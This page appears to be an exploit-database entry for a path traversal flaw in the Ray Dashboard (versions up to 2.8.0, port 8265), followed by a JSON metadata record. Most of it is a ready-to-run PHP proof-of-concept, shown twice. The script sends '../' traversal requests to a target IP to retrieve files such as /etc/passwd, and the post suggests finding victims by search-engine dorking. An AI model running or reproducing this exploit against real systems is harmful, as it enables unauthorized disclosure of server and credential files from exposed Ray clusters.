📄 Ray 2.8.0 Path Traversal_PACKETSTORM:215801

Description

A path traversal vulnerability was identified in versions prior to 2.8.1 of Ray affecting the Ray Dashboard service default port 8265. The issue stems from improper validation and sanitization of user-supplied file paths within the static file handling...

Visit Original Source

Basic Information

ID PACKETSTORM:215801

Published Feb 18, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Ray ≤ 2.8.0 Path Traversal Leading to Local File Disclosure |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://github.com/ray-project/ray |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: A Path Traversal vulnerability was identified in versions prior to 2.8.1 of Ray affecting the Ray Dashboard service (default port 8265).
The issue stems from improper validation and sanitization of user-supplied file paths within the static file handling mechanism.
By manipulating path traversal sequences (e.g., ../), an attacker may access files outside the intended static directory.

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php

[+] PayLoad :

<?php

if ($argc < 3) {
echo "Usage: php ray_lfi.php <target_ip> <file_path>\n";
echo "Example Linux: php ray_lfi.php 192.168.1.10 /etc/passwd\n";
echo "Example Windows: php ray_lfi.php 192.168.1.10 C:/Windows/win.ini\n";
exit;
}

$target = $argv[1];
$file = $argv[2];
$port = 8265;

$payload = "/static/js/" . str_repeat("../", 15) . $file;

$url = "http://{$target}:{$port}{$payload}";

echo "[*] Target: $url\n";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code === 200 && !empty($response)) {
echo "[+] File Retrieved Successfully:\n\n";
echo $response . "\n";
} else {
echo "[-] Exploit failed or target not vulnerable.\n";
}
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2026-02-18T17:36:43",
    "description": "A path traversal vulnerability was identified in versions prior to 2.8.1 of Ray affecting the Ray Dashboard service default port 8265. The issue stems from improper validation and sanitization of user-supplied file paths within the static file handling...",
    "published": "2026-02-18T00:00:00",
    "modified": "2026-02-18T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Ray 2.8.0 Path Traversal",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:215801",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Ray \u2264 2.8.0 Path Traversal Leading to Local File Disclosure                                                                 |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |\n    | # Vendor    : https://github.com/ray-project/ray                                                                                          |\n    =============================================================================================================================================\n    \n    POC :\n    \n    [+] Dorking \u0130n Google Or Other Search Enggine.\n    \n    [+] Code Description: A Path Traversal vulnerability was identified in versions prior to 2.8.1 of Ray affecting the Ray Dashboard service (default port 8265).\n                          The issue stems from improper validation and sanitization of user-supplied file paths within the static file handling mechanism. \n                          By manipulating path traversal sequences (e.g., ../), an attacker may access files outside the intended static directory.\n     \n    [+] save code as poc.php .\n    \n    [+] USage : cmd => c:\\www\\test\\php poc.php\n    \n    [+] PayLoad :\n    \n    <?php\n    \n    \n    if ($argc < 3) {\n        echo \"Usage: php ray_lfi.php <target_ip> <file_path>\\n\";\n        echo \"Example Linux: php ray_lfi.php 192.168.1.10 /etc/passwd\\n\";\n        echo \"Example Windows: php ray_lfi.php 192.168.1.10 C:/Windows/win.ini\\n\";\n        exit;\n    }\n    \n    $target = $argv[1];\n    $file = $argv[2];\n    $port = 8265;\n    \n    $payload = \"/static/js/\" . str_repeat(\"../\", 15) . $file;\n    \n    $url = \"http://{$target}:{$port}{$payload}\";\n    \n    echo \"[*] Target: $url\\n\";\n    \n    $ch = curl_init();\n    curl_setopt($ch, CURLOPT_URL, $url);\n    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n    curl_setopt($ch, CURLOPT_TIMEOUT, 10);\n    \n    $response = curl_exec($ch);\n    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\n    curl_close($ch);\n    \n    if ($http_code === 200 && !empty($response)) {\n        echo \"[+] File Retrieved Successfully:\\n\\n\";\n        echo $response . \"\\n\";\n    } else {\n        echo \"[-] Exploit failed or target not vulnerable.\\n\";\n    }\n    ?>\n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/215801",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/215801/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply